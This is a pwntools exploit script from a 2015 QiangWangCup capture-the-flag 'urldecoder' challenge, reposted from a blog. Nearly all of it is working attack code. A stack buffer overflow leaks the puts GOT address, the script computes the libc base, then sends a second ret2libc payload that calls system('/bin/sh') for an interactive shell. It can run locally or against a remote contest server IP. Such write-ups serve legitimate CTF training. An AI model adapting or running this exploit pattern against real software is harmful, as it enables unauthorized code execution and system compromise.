标签:
#Exploit for urldecoder@qiangwangcup
#@Windcarp 2015.07.05
from pwn import *
#init
context(arch = ‘i386‘, os = ‘linux‘)
local=True
if local:
p = process("./urldecoder")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
else:
p = remote("166.111.132.132", 10002)
libc = ELF("./libc.so.6.i386")
binary = ELF("urldecoder")
#address
ret_addr_str = ‘\x90\x85\x04\x08‘
len_to_ret = 0x9c
puts_plt = binary.plt[‘puts‘]
puts_got = binary.got[‘puts‘]
puts_libc = libc.symbols["puts"]
system_libc = libc.symbols["system"]
binsh_libc = libc.search(‘/bin/sh‘).next()
#payload
payload = ‘http://%\x001‘
payload += ‘a‘*(len_to_ret - 8)
payload += p32(puts_plt) + ret_addr_str + p32(puts_got)
#pause for gdb to attach
raw_input()
#first step
#attention to fit the program well
p.recvuntil("URL:")
p.send(payload + ‘\n‘)
#second step
p.recvuntil("Decode Result:")
#data = p.recv(timeout=0.01)
data = p.recvuntil("URL:")
#let‘s check
print "[*] data : ",repr(data)
print "[*] puts_got_addr : ",repr(data[9:13])
#third step
puts_got_addr = data[9:13]
puts_addr = u32(puts_got_addr)
libc_addr = puts_addr - puts_libc
system_addr = libc_addr + system_libc
binsh_addr = libc_addr + binsh_libc
#final step
payload2 = ‘http://%\x001‘
payload2 += ‘a‘*(len_to_ret - 8)
payload2 += p32(system_addr) + ret_addr_str + p32(binsh_addr)
p.send(payload2 + ‘\n‘)
#yeah!We got the shell!
p.interactive()
【PWN】Urldecoder@QiangWangCup
标签:
原文地址:http://www.cnblogs.com/windcarp/p/4622767.html
